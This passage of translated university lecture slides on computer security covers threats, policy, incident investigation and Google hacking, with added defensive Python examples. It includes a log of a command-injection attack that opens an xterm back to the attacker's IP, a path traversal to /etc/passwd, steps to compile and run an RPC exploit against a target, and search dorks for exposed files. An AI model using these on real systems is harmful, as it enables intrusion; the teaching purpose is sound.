Computer Security (Keamanan Sistem Komputer)
RUDI LUMANTO
UNIVERSITAS BUDILUHUR, Semester 2 / 2008
References and Contact Info
Matt Bishop, “Computer Security: Art and Science”, Addison-Wesley, 2003, 1084 pages.
Deborah Russell and G.T. Gangemi Sr., “Computer Security Basics”, O’Reilly & Associates.
John E. Canavan, “Fundamentals of Network Security”, Artech House.
Internet sources.
CONTACT: RUDI LUMANTO, rudi_lumanto@yahoo.com, 0815-1036-9754, Universitas Budiluhur, SATURDAY 13:15-15:45
GRADING CRITERIA
Assignments (2-4 reports): 20%. Mid-term exam: 30%. Attendance: 10%. Final exam: 40%.
SYLLABUS
Overview / introduction to computer system security; operating system and software security; physical and hardware security; network and Internet security; software threats: viruses, worms, etc.; Internet threats: TCP attacks, DNS, DoS, etc.
SYLLABUS (continued)
Firewalls; Intrusion Detection Systems (IDS); introduction to cryptography; cryptography applications; the Kerberos scheme; VPN; leak analysis.
COMPUTER SYSTEM SECURITY
OVERVIEW
Software security; software threats: viruses, worms, etc.
Hardware security
Network security; Internet threats: TCP attacks, DoS, DNS, etc.
Firewall
Basic cryptography; cryptography applications; the Kerberos scheme
VPN
Leak analysis
COMPUTER SYSTEM SECURITY
1. OVERVIEW
Outline
Why computer security? Computer security goals. Threats, vulnerabilities, attacks. Policy and measures. Simple cases and tools. Making a good security policy.
Why Computer Security
To protect company/individual assets
– Hardware, software and INFORMATION (data, ability and Reputation)
To gain a competitive advantage
– How many people will use a bank’s internet banking system if they knew that the system had been hacked in the past ?
To comply with regulatory requirements
To keep your job
Computer Security Goals
Confidentiality, Integrity, Availability (CIA)
Confidentiality: prevention of unauthorized access to data, and of accidental data disclosures.
Integrity: prevention of improper modifications of the data, whether intentional or accidental: 1) modification of the data by unauthorized parties; 2) operations on data by authorized personnel in ways that are incompatible with the nature (syntax) of the data, leading to its corruption; 3) any modification to append-only records that alters their evidential value.
Availability: measures taken to protect data should not make it cumbersome to access and modify the data in the ways that were intended.
Threats, vulnerabilities and attacks
THREATS
Anything that can disrupt the operation, functioning, integrity or availability of a computer system.
Stand-alone threats
– Threats that arise without any connection to another system. Ex: virus, password cracker
Connection threats
– Threats that arise because of a connection to another system
◆Threats arising from connection to other computers
Information leaks: a database of customer information, including credit card numbers, is leaked from an Internet service provider.
Falsification: the contents of the web site of a public institution are rewritten with the political messages of a dissident group.
Denial of service: a bookshop site is attacked and its server goes down, discontinuing service.
Impersonation: an intruder fakes a membership site for the purchase of merchandise.
Attack platform: a corporate network administering a server used as a platform for attacking other sites was sued for compensation for the damage caused.
Vulnerabilities
A weakness in the design, configuration or implementation of a computer system that renders it susceptible to a threat.
1. POOR DESIGN
Hardware and software systems that contain design flaws that can be exploited. Ex: sendmail flaws in early versions of Unix that allowed hackers to gain privileged root access.
2. POOR IMPLEMENTATION
Systems that are incorrectly configured because of inexperience, insufficient training or sloppy work. Ex: a system that does not restrict access privileges on critical executable files.
3. POOR MANAGEMENT
Inadequate procedures and insufficient checks and balances. Ex: no documentation and no monitoring.
Critical Vulnerabilities and Vulnerability Scanning
Certain security vulnerabilities are declared critical when they are being (or are about to be) actively exploited and represent a clear and present danger. Upon notification of a critical vulnerability, systems must be patched by a given date or they will be blocked from network access.
◆Types of Vulnerability
OS/Program name | Cause | Influence
Index Server (Windows NT) / Index Service (Windows 2000) | ISAPI extension idq.dll overflow | Local system permission seized by an outsider
telnetd (FreeBSD 4.3 and earlier, Red Hat 7.1 and earlier, etc.) | Buffer overflow during AYT optional packet processing | telnetd permission (normally root) seized by an outsider
sadmind (Solaris 2.3 – 7) | Buffer overflow during NETMGT_PROC_SERVICE request processing | Command executable with root permission by an outsider
SSH 1.2.31 / OpenSSH 2.2 and earlier | Overflow in an int variable in the detect_attack function | Command executable with root permission by an outsider
dtspcd (AIX 4.3/5.1, HP-UX 11.11, Solaris 8, etc.) | Buffer overflow in a shared library | Arbitrary command executable with root permission by an outsider
BIND 8.2x (Red Hat, Turbolinux, Solaris, AIX, etc.) | Buffer overflow during TSIG processing | Operation permission (normally root) seized by an outsider
wu-ftpd 2.6.0 and earlier (Red Hat Linux 6.2 and earlier, etc.) | Format string bug in the site-exec and setproctitle functions | Execution permission (normally root) seized by an outsider
IIS 4.0 (Windows NT) / IIS 5.0 (Windows 2000) | Access to a file outside the root directory permitted when the path name is UNICODE | Shell command executed with IUSR_Machinename permission by an outsider
ATTACKS
A specific technique used to exploit a vulnerability. Ex: a threat could be a denial of service, the vulnerability is in the design of the OS, and the attack could be a “ping of death”.
Passive attacks
– Gathering information by monitoring and recording traffic on the network, or by social engineering. Ex: packet sniffing, traffic analysis
Active attacks
– Overt actions against the computer system.
◆Denial of Service
(Diagram: an attack platform starts the attack against the target host by sending a large volume of data or packets that cause a system down; the target's service goes down due to overload.)
Policy and Measure
Security Trinity: the foundation for all security policies and measures that an organization develops and deploys.
Security
What is security? Definitions from the American Heritage Dictionary: freedom from risk or danger; safety. Measures adopted to prevent a crime.
Computer security measures: mechanisms to prevent, detect and recover from threats and attacks, or for auditing purposes.
(Figure: the security trinity as a triangle with the three sides Prevention, Detection and Response/Recovery.)
Key point
Computer security is not only a technical problem; it is a business and people problem. The technology is the easy part. The difficult part is developing security policies and a plan that fit the organization’s business operations, and getting people to comply with the plan.
Social engineering: the non-technical methods hackers employ to gain access to a system; it refers to the process of convincing a person to reveal information.
Security operations
- Prevention against accidental capture or modification of information
- Detection of all improper access to data and system resources
- Recovery from unauthorized access: restoring data values, system integrity, etc.
Policies and Procedures
- User privileges
- Data backup
- Security tools to deploy
- Monitoring the integrity
- Response to incidents
- User role, etc.
◆Types of Users
Hacker: a user who tries to obtain access using advanced knowledge and techniques.
Cracker: a user who attempts sabotage and other subversive activities with malicious motives.
Script kiddy: a user who has little technical capability and uses tools available on the Internet when attempting cyber attacks.
(Diagram: the three user types reach the corporate network through a vulnerability; the arrows are labelled "intrusion, subversion, sabotage" and "subversion, sabotage".)
◆Integrity Check Tool
(Diagram: the /etc/passwd file is hashed and its MD5 value recorded.)
#hash value (MD5) dc577ef5f97b671781c04425737bc4df
After file editing/falsification the hash is recomputed: b0ed782bbd4c8445f07538a3ede788eb
Mismatch ... Altered!!
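The baseline-and-verify idea on the slide, as an added example (this is not code from the lecture). A baseline of file hashes is recorded once; later runs recompute the hashes and report any file whose digest no longer matches as altered. The slide shows MD5; this example records MD5 alongside SHA-256 and decides on SHA-256, since MD5 collisions are practical. The file names and contents below are constructed for the demonstration, with a temporary file standing in for /etc/passwd.

```python
"""File integrity baseline and verification (added example, not from the slides)."""
import hashlib
import json
import os
import tempfile


def _new_hashers():
    # MD5 is kept only to match what the slide shows; SHA-256 is the one trusted.
    return {"md5": hashlib.md5(), "sha256": hashlib.sha256()}


def _finish(hashers):
    return {name: h.hexdigest() for name, h in hashers.items()}


def hexdigests(data):
    """Digests of an in-memory byte string (handy for known-answer checks)."""
    hashers = _new_hashers()
    for h in hashers.values():
        h.update(data)
    return _finish(hashers)


def file_digests(path):
    """Digests of a file, read in chunks so large files do not need to fit in memory."""
    hashers = _new_hashers()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            for h in hashers.values():
                h.update(chunk)
    return _finish(hashers)


def build_baseline(paths):
    """Hash every listed file once; the result is the trusted reference."""
    return {p: file_digests(p) for p in paths}


def save_baseline(baseline, out_path):
    with open(out_path, "w") as fh:
        json.dump(baseline, fh, indent=2, sort_keys=True)


def load_baseline(in_path):
    with open(in_path) as fh:
        return json.load(fh)


def verify(baseline):
    """Compare the current files against the baseline.

    Returns a dict path -> 'ok' | 'altered' | 'missing'. The comparison uses
    SHA-256; an MD5 match alone would not be trusted.
    """
    result = {}
    for path, expected in baseline.items():
        if not os.path.exists(path):
            result[path] = "missing"
            continue
        current = file_digests(path)
        result[path] = "ok" if current["sha256"] == expected["sha256"] else "altered"
    return result


def demo():
    """Constructed scenario: baseline a stand-in passwd file, then tamper with it."""
    tmp = tempfile.mkdtemp()
    passwd = os.path.join(tmp, "passwd")  # stand-in for /etc/passwd (constructed)
    with open(passwd, "w") as fh:
        fh.write("root:x:0:0:root:/root:/bin/bash\n")
    baseline_file = os.path.join(tmp, "baseline.json")
    save_baseline(build_baseline([passwd]), baseline_file)
    before = verify(load_baseline(baseline_file))[passwd]
    # Simulated falsification: an extra UID-0 account is appended to the file.
    with open(passwd, "a") as fh:
        fh.write("lion:x:0:0::/home/lion:/bin/bash\n")
    after = verify(load_baseline(baseline_file))[passwd]
    return before, after


if __name__ == "__main__":
    print(demo())  # ('ok', 'altered')
```

In practice the baseline file must itself be protected (stored off-host or signed), because an intruder who can rewrite /etc/passwd can usually rewrite a baseline kept beside it.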
◆Security Tools and Security Products
(Diagram: a malicious user on the Internet reaching the corporate network and its servers/clients.)
Network security – countermeasures against hacking: • Router (filtering) • Firewall (VPN) • N-IDS • Vulnerability audit • Virus scan • Encryption
Server security: • H-IDS • Log monitoring • Falsification prevention • Vulnerability audit • Virus scan • Encryption (SSH)
Miscellaneous
◆Firewall?
(Diagram: on the Internet side an HTTP client and the public FTP and WWW servers, on the intranet side an AP server and clients; numbered flows ① HTTP, ② HTTP, ③ FTP to the public FTP server, ④ HTTP, ⑤ unspecified traffic to the AP server, with authentication at the firewall.)
• Packet filtering • Gateway-type firewall (application gateway) • Stateful inspection
◆Encryption
VPN (Virtual Private Network) = a "leased line" over the Internet, e.g. IPsec, IPv6.
(Diagram: a remote access user and FW/VPN routers at providers A, B, C and D exchange encrypted communication across the Internet through an IX.)
Response to Computer Security Incidents
Mandatory incident reporting;
– Report all suspicious activity, e.g.:
• If urgent, to the Computer Helpdesk
• Or to the system manager (if immediately available);
• Non-urgent, to computer_security@fnal.gov;
– Incidents are investigated by the Computer Incident Response Team (CIRT);
– Not to be discussed!
CIRT (Computer Security Incident Response Team)
Security experts drawn from throughout the lab; investigate (“triage”) initial reports; coordinate the overall investigation; work with local system managers; call in technical experts; may take control of affected systems; maintain confidentiality.
Other Rules for General Systems
Warning system;
– First time warning, repeat offense disciplinary action;
Unauthorized or malicious actions;
– Damage of data, unauthorized use of accounts, denial of service, etc., are forbidden;
Ethical behavior;
– Same standards as for non-computer activities;
Restricted central services;
– May only be provided by Computing Division;
Security & cracker tools;
– Possession (& use) must be authorized;
User role
Guard against malicious code in email
– Don’t open attachments unless you are sure they are safe
– Don’t trust who the email is from
– Keep virus signatures updated and enabled
Guard against malicious code from web browsing
User role - 2
Obey the Strong Authentication Policy (Kerberos)
– Don’t run network services (login or read/write ftp) unless they demand Kerberos authentication
– Treat your Kerberos password as a sacred object (never expose it over the network)
Promptly report potential computer security incidents
– Ex : call by telephone or email to computer_security@fnal.gov (if in US) – Follow CIRT instructions during incidents (especially about keeping infected machines off the network and preserving the status of an infected machine for expert investigation)
Example of Policy Issues
Data backup Incidental use Privacy Offensive material Licensing
Data Backup Policy - Users
– Users (data owners) responsible for determining:
• What data requires protection; • How destroyed data would be recovered, if needed; • Coordinating backup plan w/ sysadmins;
– or doing their own backups;
• If the backup is done for you it might be worth occasionally checking that you can really retrieve the data
Privacy of Email and Files
May not use information in another person’s files seen incidental to any activity (legitimate or not) for any purpose w/o either explicit permission of the owner or a “reasonable belief the file was meant to be accessed by others.”
– Whether or not group/world accessible; – “Group” files implicitly may be used by the group for the mission of the group;
A simple case and tool (seeing the technique/information behind a case)
A Security Case
A company called “Acme-art Inc.” does online business on the Internet. It has a database that records all customer information, including credit card details, connected to its site www.acme-art.com, which is protected by a firewall. On 31 October 2001 a hacker intruded into the system, stole all the credit card information and posted it to a Usenet newsgroup. Within a few hours the company had lost millions of dollars and its reputation, and had to invest much more money to keep the business alive.
What happened? How could it happen?
Fact: the firewall is installed, and Internet access to the site is only possible through HTTP port 80.
Security team investigation:
Sample case 1
Looking for clues in the log file (the entries are grouped into parts A to F, examined one by one on the following slides)…
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET / HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /yf_thumb.jpg HTTP/1.0" 200 3452
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /fl_thumb.jpg HTTP/1.0" 200 8468
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /th_thumb.jpg HTTP/1.0" 200 6912
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /mn_thumb.jpg HTTP/1.0" 200 7891
10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /index.cgi?page=falls.shtml HTTP/1.0" 200 680
10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /falls.jpg HTTP/1.0" 200 52640
10.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /index.cgi?page=tahoel.shtml HTTP/1.0" 200 652
10.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /tahoel.jpg HTTP/1.0" 200 36580
10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /cgi-bin/ HTTP/1.0" 403 272
10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /index.cgi HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:05:31 +0530] "GET /index.cgi?page= HTTP/1.0" 200 358
10.0.1.21 - - [31/Oct/2001:03:06:21 +0530] "GET /index.cgi?page=/../../../../../../../../../etc/passwd HTTP/1.0" 200 358
10.0.1.21 - - [31/Oct/2001:03:07:01 +0530] "GET /index.cgi?page=|ls+-la+/%0aid%0awhich+xterm| HTTP/1.0" 200 1228
10.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+- display+10.0.1.21:0.0 +%26| HTTP/1.0" 200 1228
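What the security team did by eye can be automated. The following is an added example (not part of the lecture) that parses access-log lines in the NCSA common log format shown above and flags the two patterns the investigation found: a directory-traversal value and shell metacharacters (the pipe, newline) in a query parameter, plus the empty-parameter probe that preceded them. The sample lines are a constructed subset modelled on the slide's log.

```python
"""Detection pass over web server access-log lines (added example, not from the slides)."""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# NCSA common log format: ip ident user [time] "method target proto" status size
# The target is matched lazily so that a request line containing spaces still parses.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>.*?) (?P<proto>HTTP/\d\.\d)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)


def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def classify_request(target):
    """Return a list of finding tags for a request target (path plus query string)."""
    findings = []
    query = urlsplit(target).query
    # parse_qsl already percent-decodes; the extra unquote_plus catches double-encoded values.
    for _, value in parse_qsl(query, keep_blank_values=True):
        decoded = unquote_plus(value)
        if "../" in decoded:
            findings.append("path_traversal")
        if any(ch in decoded for ch in "|;`$") or "\n" in decoded:
            findings.append("command_injection")
        if decoded == "":
            findings.append("empty_parameter_probe")
    return findings


def scan(lines):
    """Parse every line and return (ip, time, target, findings) for the suspicious ones."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify_request(rec["target"])
        if tags:
            hits.append((rec["ip"], rec["time"], rec["target"], tags))
    return hits


# Constructed sample, modelled on the log entries on the slide.
SAMPLE_LOG = [
    '10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET / HTTP/1.0" 200 3008',
    '10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /index.cgi?page=falls.shtml HTTP/1.0" 200 680',
    '10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /cgi-bin/ HTTP/1.0" 403 272',
    '10.0.1.21 - - [31/Oct/2001:03:05:31 +0530] "GET /index.cgi?page= HTTP/1.0" 200 358',
    '10.0.1.21 - - [31/Oct/2001:03:06:21 +0530] "GET /index.cgi?page=/../../../../../../../../../etc/passwd HTTP/1.0" 200 358',
    '10.0.1.21 - - [31/Oct/2001:03:07:01 +0530] "GET /index.cgi?page=|ls+-la+/%0aid%0awhich+xterm| HTTP/1.0" 200 1228',
    '10.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+-display+10.0.1.21:0.0+%26| HTTP/1.0" 200 1228',
]

if __name__ == "__main__":
    for ip, when, target, tags in scan(SAMPLE_LOG):
        print(f"{when} {ip} {tags} {target}")
```

Note that every flagged request was answered with status 200: the CGI accepted the input, so a filter on error codes alone would have found nothing. The 403 on /cgi-bin/ is the only error in the whole sequence.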
Security team investigation: Part A in the log file
Sample case 1
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET / HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /yf_thumb.jpg HTTP/1.0" 200 3452
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /fl_thumb.jpg HTTP/1.0" 200 8468
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /th_thumb.jpg HTTP/1.0" 200 6912
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /mn_thumb.jpg HTTP/1.0" 200 7891
Browsing …….
Security team investigation: Part B in the log file
Sample case 1
10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /index.cgi?page=falls.shtml HTTP/1.0" 200 680
10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /falls.jpg HTTP/1.0" 200 52640
10.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /index.cgi?page=tahoel.shtml HTTP/1.0" 200 652
10.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /tahoel.jpg HTTP/1.0" 200 36580
Browsing …….
Security team investigation: Part C in the log file
Sample case 1
10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /cgi-bin/ HTTP/1.0" 403 272
Trying direct access …. Error response
Security team investigation: Part D in the log file
Sample case 1
10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /index.cgi HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:05:31 +0530] "GET /index.cgi?page= HTTP/1.0" 200 358
Attacking …
Security Hole 1
Security team investigation:
Sample case 1
Perl script (shown on the slide)
Security hole 1: there is no validation of the page parameter before it is passed on to the index.cgi script.
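Security hole 1 and its fix, as an added example; the slide's own Perl script is not reproduced here, and the functions and sample pages below are constructed for the demonstration. The CGI took the page parameter and opened whatever it named. In Perl, a two-argument open() treats a filename that begins or ends with "|" as a command to run through the shell, and a value with "../" segments as a path anywhere on disk, which is exactly what the two log entries in parts E and F exploited. The hardened version allowlists the shape of the name and then confirms that the resolved path still lies under the document root.

```python
"""Unvalidated page parameter versus a hardened resolver (added example, not the slide's Perl)."""
import os
import tempfile

ALLOWED_SUFFIXES = (".shtml", ".html")


class PageRejected(Exception):
    pass


def unsafe_resolve(docroot, page):
    """The vulnerable pattern: trust the parameter and join it to the root.

    An absolute value or one with '..' segments walks straight out of docroot;
    normpath tidies the string but does not confine it.
    """
    return os.path.normpath(os.path.join(docroot, page))


def safe_resolve(docroot, page):
    """Hardened: validate the name shape, then check the real path stays under docroot."""
    if not page or not page.endswith(ALLOWED_SUFFIXES):
        raise PageRejected("not an allowed page name")
    # No path separators and no shell metacharacters: a page is a bare file name.
    if "/" in page or "\\" in page or any(ch in page for ch in "|;&`$\n\r\0"):
        raise PageRejected("forbidden character in page name")
    root = os.path.realpath(docroot)
    candidate = os.path.realpath(os.path.join(root, page))
    # realpath follows symlinks, so a link inside docroot pointing outside is caught too.
    if os.path.commonpath([root, candidate]) != root:
        raise PageRejected("path escapes document root")
    return candidate


def render(docroot, page):
    """Serve a page through safe_resolve; returns ('ok', text) or ('rejected', reason)."""
    try:
        path = safe_resolve(docroot, page)
    except PageRejected as exc:
        return ("rejected", str(exc))
    with open(path) as fh:
        return ("ok", fh.read())


def demo():
    """Constructed document root with one legitimate page and the inputs from the log."""
    tmp = tempfile.mkdtemp()
    with open(os.path.join(tmp, "falls.shtml"), "w") as fh:
        fh.write("<h1>Falls</h1>")
    probes = ["falls.shtml", "/../../../../etc/passwd", "|ls -la /|", "sub/../falls.shtml", ""]
    return {page: render(tmp, page)[0] for page in probes}


if __name__ == "__main__":
    print(unsafe_resolve("/var/www/html", "/../../../../../../../../../etc/passwd"))  # /etc/passwd
    print(demo())
```

The allowlist check rejects the traversal and pipe values before any file system call is made; the commonpath check is the backstop for anything that slips past the name check, such as a symlink planted inside the document root.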
Security team investigation: Part E in the log file
Sample case 1
10.0.1.21 - - [31/Oct/2001:03:06:21 +0530] "GET /index.cgi?page=/../../../../../../../../../etc/passwd HTTP/1.0" 200 358
Attacking …
Security Hole 1
Retrieving the passwd file
Security team investigation: passwd file
root:x:0:0:root:/root:/bin/bash
……
……
……
Lion:x:500:500::/home/lion:/bin/bash
Sample case 1
Security hole 1 effect: retrieval of the important “passwd” file
Security team investigation: Part F in the log file
Sample case 1
10.0.1.21 - - [31/Oct/2001:03:07:01 +0530] "GET /index.cgi?page=|ls+-la+/%0aid%0awhich+xterm| HTTP/1.0" 200 1228
10.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+- display+10.0.1.21:0.0 +%26| HTTP/1.0" 200 1228
Attacking …
Security Hole 2
Direct execution of commands on the server
Information/technique behind the case
Information about the target; HTTP structure; CGI/Perl; the Linux system and its commands
Httpd file default structure
What is the web site structure? (host: Lisv01)
/ (root)
  home/
    u01/, u02/, u03/, …
      public_html/ (default user’s directory)
  var/
    www/
      html/ (default document root)
    log/
  etc/
    httpd/
      conf/
        httpd.conf
    init.d/
      httpd
  sbin/, bin/, dev/, usr/ …
* Document root: the directory that holds HTML documents. Entries without a trailing slash are files.
Behind the Web (three application models)
Client-side application: the WWW server software sends HTML and script (JavaScript) across the Internet/intranet; the WWW browser executes the application.
Network-loading application: the WWW server software sends the application itself (Java applet, ActiveX) across the Internet/intranet; the WWW browser loads and executes it.
Server-side application: the WWW browser sends a request across the Internet/intranet; the WWW server software executes the application (CGI, Active Server Pages) and returns the result.
Sample case 2
Sample case 2
After a period of new recruitment, a server in a company suddenly crashed. The company network became unavailable for a while and this led to a large loss in production. What happened? How could it happen? No indication in the log files!!!
Sample case 2
Security team investigation: looking for clues by social engineering. One new employee installed Windows 2000 Server on his computer and connected it to the LAN with a global IP address. Other clues: 1. Nessus report on vulnerabilities in Windows 2000; 2. exploit program available.
Nessus report on Windows 2000 Server after IIS installation: analysis of host 192.168.27.31
Host | Port/Service | Issue regarding port
192.168.27.31 | ftp (21/tcp) | Security hole found
192.168.27.31 | smtp (25/tcp) | Security hole found
192.168.27.31 | http (21/tcp) | Security hole found
192.168.27.31 | nntp (119/tcp) | Security hole found
192.168.27.31 | msrpc (135/tcp) | Security hole found
192.168.27.31 | netbios-ssn (139/tcp) | Security hole not found
192.168.27.31 | https (443/tcp) | Security hole not found
192.168.27.31 | microsoft-ds (445/tcp) | Security hole found
…… | …… | ……
Sample case 2
NESSUS report in detail
Other references: IAVA:2003-A-0012 NESSUS ID:11835
Vulnerability: msrpc (135/tcp)
The remote host is running a version of Windows which has a flaw in its RPC interface which may allow an attacker to execute arbitrary code and gain SYSTEM privileges. There is at least one WORM which is currently exploiting this vulnerability, namely the MSBlaster worm.
Solution: see http://www.microsoft.com/technet/security/bulletin/MS03-026.mspx
Risk factor: high
CVE: CAN-2003-0352; BID: 8205; Other references: IAVA:2003-A-0011; NESSUS ID: 11806
Warning: msrpc (135/tcp)
Distributed Computing Environment (DCE) services running on the remote host
Sample case 2
NESSUS ID: identity number of the vulnerability check performed by NESSUS. BID: Bugtraq ID: related documentation regarding the vulnerability, including exploit code; see the SecurityFocus site.
Simulation:
1. Downloading the exploit source file (from the SecurityFocus site or the Whoppix CD): $cp /KNOPPIX/pentest/exploits/securityfocus/8205/oc192-dom.c
2. Compiling the source file: $gcc oc192-dom.c
3. Executing the exploit against the target machine's IP: $a.out -d 192.168.94.204
Get system access:
C:>WINNT\SYSTEM32\
Information/technique behind the case
- Insufficient security orientation for new employees
- Lack of knowledge about the OS
- There is always exploit code on the Internet
- Lack of information about updates
Sample case 3: what kind of security techniques are behind it?
The Warriors of the Net
Making a good security policy
Making a good security policy
Penetration Test/Ethical Hacking
– Understanding what is inside the hacker's mind
Security Trinity Security Goals
Definition of "Ethical Hacking"
An ethical hacker is a computer and network expert who attacks a security system on behalf of its owners, seeking vulnerabilities that a malicious hacker could exploit. To test a security system, ethical hackers use the same methods as their less principled counterparts, but report problems instead of taking advantage of them. Ethical hacking is also known as penetration testing, intrusion testing, and red teaming. Individuals involved in ethical hacking are sometimes called white hats, a term that comes from old Western movies, where the "good guy" wore a white hat and the "bad guy" wore a black hat. One of the first examples of ethical hacking at work was in the 1970s, when the United States government used groups of experts called red teams to hack its own computer systems. According to Ed Skoudis, Vice President of Security Strategy for Predictive Systems' Global Integrity consulting practice, ethical hacking has continued to grow in an otherwise lackluster IT industry, and is becoming increasingly common outside the government and technology sectors where it began. Many large companies, such as IBM, maintain employee teams of ethical hackers.
Inside the Hacker's Mind
- Successfully attack and stay safe -
Focus on the target. Never use your own information. Never leave your footprints. Be able to come back again.
HACKER'S PROCEDURE
Hacker's procedure/steps
1. Information gathering
2. Attack, intrusion
3. Unauthorized act
4. Actions taken after the unauthorized act
Techniques: targeting, scanning, remote attack, local attack, log removing/deception, space using, time stamp, back door.
Example of Targeting
All information about the target
Technique name: web browser targeting. Goal: personal information about the target. Operation base: any web browser with a search engine site (Google); online databases (WHOIS, IP conversion, etc.)
Location, related company/organization, news, telephone number, contact (mail address), the web author's ideas/thoughts/behaviour, site software
Targeting with Google
By using basic search techniques combined with Google's advanced operators, anyone can perform information gathering and vulnerability searching using Google. This technique is commonly referred to as Google hacking.
Google hacking
Mastering Google using its standard options
– Double quotation marks …. the keyword is recognized as a phrase
– Hyphen (-) …. exclude words containing the keyword
– site: …. searching only inside the site
– * …. wildcard; use with double quotation marks to find any indicated word
– intitle: …. search limited only to the web title
– inurl: …. search limited only to the web page URL
– intext: …. search limited only to the main text of the web page
– filetype: …. search focusing on the extension type of the file
– phonebook: …. search telephone numbers
Google hacking
Mastering Google using its standard options: examples
– site: …. searching only inside the site. “hacker” site:www.cnn.com or site:www.cnn.com hacker. This query searches for the word hacker, restricting the search to the http://www.cnn.com web site: how many pages on the CNN web server contain the word hacker?
– * …. wildcard; use with double quotation marks to find any indicated word. “He is a * Hacker”
– intitle: …. search limited only to the web title. intitle:“Hacker”
– inurl: …. search limited only to the web page URL. inurl:www.securityfocus.com
– intext: …. search limited only to the main text of the web page. intext:“earthquake”
– filetype: …. search focusing on the extension type of the file. “hacking” filetype:ppt; "whoppix" filetype:iso
– phonebook: …. search telephone numbers. phonebook: John Doe CA
More on Google hacking
Searching inside a site for content that is not (intentionally) exposed to the public
Finding directory listings on a server
Directory listings provide a list of files and directories in a browser window instead of the typical text-and-graphics mix generally associated with web pages. These pages offer a great environment for deep information gathering.
Most directory listings begin with the phrase Index of, which also shows in the title. An obvious query to find this type of page might be intitle:index.of, which may find pages with the term index of in the title of the document. Unfortunately, this query will return a large number of false positives, such as pages with the following titles: Index of Native American Resources on the Internet; LibDex—Worldwide index of library catalogues; Iowa State Entomology Index of Internet Resources.
More on Google hacking
Combining Google options in queries. Several alternate queries that provide more accurate results: intitle:index.of "parent directory" and intitle:index.of name size. These queries indeed provide directory listings by not only focusing on index.of in the title, but on keywords often found inside directory listings, such as parent directory, name, and size. Obviously, this search can be combined with other searches to find files or directories located in directory listings.
Examples (a listing page shows the column headers Name, Last modified, Size, Description and a Parent Directory link):
intitle:"Index of" intitle:"data"
intitle:"Index of" intitle:"data" intitle:bbs
bbs.dat inurl:"Index of" intitle:"Index of"
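The same signature the queries above rely on can be used by a site owner to check their own server before a search engine indexes it. The following is an added example (not from the lecture) that tests a fetched HTML body for the directory-listing fingerprint described on these slides: a title beginning with "Index of" plus the column names a server-generated listing carries (Name, Last modified, Size, Description, Parent Directory), and then lists any linked files with extensions that the later slides search for (csv, xls, dat). The HTML pages and file names are constructed for the demonstration; fetching is left to the caller so the check runs offline.

```python
"""Directory-listing fingerprint check for one's own pages (added example, not from the slides)."""
import re
from html.parser import HTMLParser

# Column names and link text that Apache-style auto-generated listings carry.
LISTING_MARKERS = ("Name", "Last modified", "Size", "Description", "Parent Directory")
# Extensions the lecture's later queries look for in listings (csv, xls, dat) plus backups.
RISKY_EXTENSIONS = (r"\.csv$", r"\.xls$", r"\.dat$", r"\.bak$")


class _TextGrabber(HTMLParser):
    """Collects the <title> text and all visible text from an HTML document."""

    def __init__(self):
        super().__init__()
        self.title = ""
        self._in_title = False
        self.text = []

    def handle_starttag(self, tag, attrs):
        if tag == "title":
            self._in_title = True

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data
        self.text.append(data)


def analyse_listing(html):
    """Decide whether an HTML body looks like a server-generated directory listing.

    Requires both an 'Index of' title and at least three of the listing markers,
    which keeps pages merely titled 'Index of ...' (the false positives on the
    slide) from matching.
    """
    grabber = _TextGrabber()
    grabber.feed(html)
    flat = " ".join(s.strip() for s in grabber.text if s.strip())
    matched = [m for m in LISTING_MARKERS if m in flat]
    title = grabber.title.strip()
    is_listing = title.lower().startswith("index of") and len(matched) >= 3
    return {"is_listing": is_listing, "title": title, "markers": matched}


def exposed_files(html, patterns=RISKY_EXTENSIONS):
    """Names of linked files in the page whose extension matches a risky pattern."""
    hrefs = re.findall(r'href="([^"]+)"', html)
    return [h for h in hrefs if any(re.search(p, h, re.I) for p in patterns)]


# Constructed sample: what an auto-generated listing of a /data directory looks like.
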